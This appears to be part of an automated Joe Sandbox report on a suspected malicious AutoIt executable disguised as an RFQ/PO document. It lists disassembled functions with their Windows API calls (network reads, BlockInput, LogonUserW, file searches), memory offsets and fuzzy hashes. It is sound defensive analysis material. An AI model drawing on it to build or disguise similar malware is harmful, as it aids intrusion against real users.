Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95

Function 00436ADE Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
FindClose.KERNEL32(00000000), ref: 00436B13

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA

Function 00443390 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 004433A2

Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A

Strings

rJ, xrefs: 00443399

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: rJ
API String ID: 2893107130-1865492326
Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98

Function 00443391 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 004433A2

Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A

Strings

rJ, xrefs: 00443399

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: rJ
API String ID: 2893107130-1865492326
Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88

Function 0044289D Relevance: 3.1, APIs: 2, Instructions: 82networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9

Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Internet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 901099227-0
Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A

Function 0045DD7C Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
FindClose.KERNEL32(00000000), ref: 0045DDDD

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94

Function 0047CBF0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

HH, xrefs: 0047CF38
0vH, xrefs: 0047CFD9

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID: 0vH$HH
API String ID: 0-728391547
Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A

Function 0040F890 Relevance: 2.1, APIs: 1, Instructions: 589COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040FF34

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794

Function 0047E1FA Relevance: 2.0, APIs: 1, Instructions: 499COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Proc
String ID:
API String ID: 2346855178-0
Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179

Function 0045A259 Relevance: 1.5, APIs: 1, Instructions: 21keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0045A272

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66

Function 0043916A Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32

Function 004711D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 004711E4

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB

Function 0042202E Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619

Function 00412C38 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4

Function 00412818 Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4

Function 0041240C Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4

Function 00412038 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4

Function 0567CB08 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723983485.0000000005679000.00000040.00000020.00020000.00000000.sdmp, Offset: 05679000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5679000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 9a916aad46682a9f993d62b987442aae3ff8380aee42e134f715092fdc669134
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 3841D371D1051CEBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 0567C9F8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723983485.0000000005679000.00000040.00000020.00020000.00000000.sdmp, Offset: 05679000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5679000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: a5288040b0333e088b568916745b25a2cba582e992f8834aff31742412b2efef
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 7F019278A10509EFDB44DF98C590DAEF7F6FB48310F208699D819A7701E730AE41DB80

Function 0567C998 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723983485.0000000005679000.00000040.00000020.00020000.00000000.sdmp, Offset: 05679000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5679000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 5605521a31d8f299a4997b958c8bfaf0b814c1e79873bf0a0baa019200780ba4
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 50019279A00109EFDB88DF98C590DAEF7F6FB48310F208699E809A7701D730AE41DB80

Function 00410D10 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229

Function 0567B358 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723983485.0000000005679000.00000040.00000020.00020000.00000000.sdmp, Offset: 05679000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5679000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00459384 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 480filewindowcomCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 004593D7
DeleteObject.GDI32(?), ref: 004593F1
DestroyWindow.USER32(?), ref: 00459407
GetDesktopWindow.USER32 ref: 0045942A
GetWindowRect.USER32(00000000), ref: 00459431
SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
GetClientRect.USER32(00000000,?), ref: 004595C8
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
